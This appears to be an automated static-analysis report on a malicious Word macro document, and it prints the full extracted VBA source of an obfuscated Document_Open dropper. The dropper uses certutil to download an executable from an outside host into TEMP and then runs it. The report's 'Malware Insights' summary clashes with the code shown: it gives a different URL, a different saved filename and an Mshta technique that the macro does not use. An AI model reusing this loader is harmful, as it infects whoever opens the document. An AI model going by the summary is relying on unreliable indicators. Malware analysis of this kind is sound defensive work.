Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 199d0e9333220bbe…

MALICIOUS

Office (OLE)

162.5 KB Created: 2019-02-11 13:42:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 15222cc04ef5f9e4f869983086a5286c SHA-1: 1a14dd3e4fa19472669d1507b315df79eb653c77 SHA-256: 199d0e9333220bbe1d4aa0e1ba7c076f8ac9cd7dd6d6d31943053f7b1eb0292c
498 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218.005 System Binary Proxy Execution: Mshta

The Document_Open macro uses WScript.Shell to execute certutil.exe to download a second-stage payload from the reconstructed URL "https://osb-driver.com/css/osb-driver.exe" and save it as "osb-driver.exe" in a temporary directory. It then proceeds to execute the downloaded file. The use of certutil for downloading and WScript.Shell for execution are critical findings.

Heuristics 13

  • ClamAV: Doc.Dropper.Agent-6960068-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6960068-0
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    rthybfhd (60)
    Shell (trfutyjnih)
    End Sub
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    trfutyjnih = Environ$(Replace("trfgmprfg", "rfg", "")) & "\" & Replace("upadte.bbc", "bbc", "exe")
    Set eryd = CreateObject("WScript.Shell")
    eryd.Run Replace("xx -urlcache -split -f ", "xx", "certutil.exe") & hh & " " & trfutyjnih, Replace("0555", "555", ""), Replace("500Fa500lse500", "500", "")
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    Set eryd = CreateObject("WScript.Shell")
    eryd.Run Replace("xx -urlcache -split -f ", "xx", "certutil.exe") & hh & " " & trfutyjnih, Replace("0555", "555", ""), Replace("500Fa500lse500", "500", "")
    rthybfhd (60)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    trfutyjnih = Environ$(Replace("trfgmprfg", "rfg", "")) & "\" & Replace("upadte.bbc", "bbc", "exe")
    Set eryd = CreateObject("WScript.Shell")
    eryd.Run Replace("xx -urlcache -split -f ", "xx", "certutil.exe") & hh & " " & trfutyjnih, Replace("0555", "555", ""), Replace("500Fa500lse500", "500", "")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    trfutyjnih = Environ$(Replace("trfgmprfg", "rfg", "")) & "\" & Replace("upadte.bbc", "bbc", "exe")
    Set eryd = CreateObject("WScript.Shell")
    eryd.Run Replace("xx -urlcache -split -f ", "xx", "certutil.exe") & hh & " " & trfutyjnih, Replace("0555", "555", ""), Replace("500Fa500lse500", "500", "")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    fb = Replace(("qsohfalobitanbd.com/css/OSB%20Driver.bbc"), "bbc", "exe")
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    hh = Replace(fb, "qsohf", "https://")
    trfutyjnih = Environ$(Replace("trfgmprfg", "rfg", "")) & "\" & Replace("upadte.bbc", "bbc", "exe")
    Set eryd = CreateObject("WScript.Shell")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to certutil (download/decode) high SC_STR_CERTUTIL
    Reference to certutil (download/decode)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 950 bytes
SHA-256: 075086e0fd46dcb9d2866e4319bd598a74fc9b60c8b2d9479836698bc4e74c9c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
fb = Replace(("qsohfalobitanbd.com/css/OSB%20Driver.bbc"), "bbc", "exe")
hh = Replace(fb, "qsohf", "https://")
trfutyjnih = Environ$(Replace("trfgmprfg", "rfg", "")) & "\" & Replace("upadte.bbc", "bbc", "exe")
Set eryd = CreateObject("WScript.Shell")
eryd.Run Replace("xx -urlcache -split -f ", "xx", "certutil.exe") & hh & " " & trfutyjnih, Replace("0555", "555", ""), Replace("500Fa500lse500", "500", "")
rthybfhd (60)
Shell (trfutyjnih)
End Sub
Sub rthybfhd(sec)
    Dim temp
    temp = Timer
    Do While Timer - temp < sec
    Loop
End Sub

Attribute VB_Name = "NewMacros"
Sub my()
'
' my Macro
'
'

End Sub